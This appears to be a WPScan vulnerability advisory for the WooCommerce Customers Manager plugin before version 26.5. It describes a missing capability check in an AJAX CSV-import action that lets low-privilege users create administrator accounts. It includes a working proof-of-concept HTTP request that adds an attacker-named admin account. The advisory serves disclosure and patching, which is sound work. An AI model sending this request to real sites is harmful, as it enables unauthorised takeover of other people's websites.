WordPress Plugin Vulnerabilities
Woocommerce Customers Manager < 26.5 - Arbitrary Account Creation/Update by Low Privilege Users
Description
The upload_csv AJAX action, available to authenticated users, did not have proper capability checks. allowing any authenticated users, such as a subscriber, to call it and import arbitrary users. They could either update their own account, to make themselves administrator, or create new administrator accounts.
Note (WPScanTeam): Even though capability check has been added in v26.5, there is still no CSRF, which could allow attacker to perform the same attack by tricking a logged infuser with the manage_woocommerce capability to open a malicious link/page. A separate issue has been created for it.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------11119326056266279563140446786 Content-Length: 683 Connection: close Cookie: [low role account, such as subscriber] -----------------------------11119326056266279563140446786 Content-Disposition: form-data; name="action" upload_csv -----------------------------11119326056266279563140446786 Content-Disposition: form-data; name="send-notification-email" no -----------------------------11119326056266279563140446786 Content-Disposition: form-data; name="csv" "ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","admin-attacker@localhost.org" -----------------------------11119326056266279563140446786--
Affects Plugins
Fixed in 26.5 References
Classification
Type
PRIVESC
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
John Castro (Pagely.com)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-02-24 (about 3 years ago)
Added
2021-03-30 (about 3 years ago)
Last Updated
2021-04-09 (about 3 years ago)
WPScan 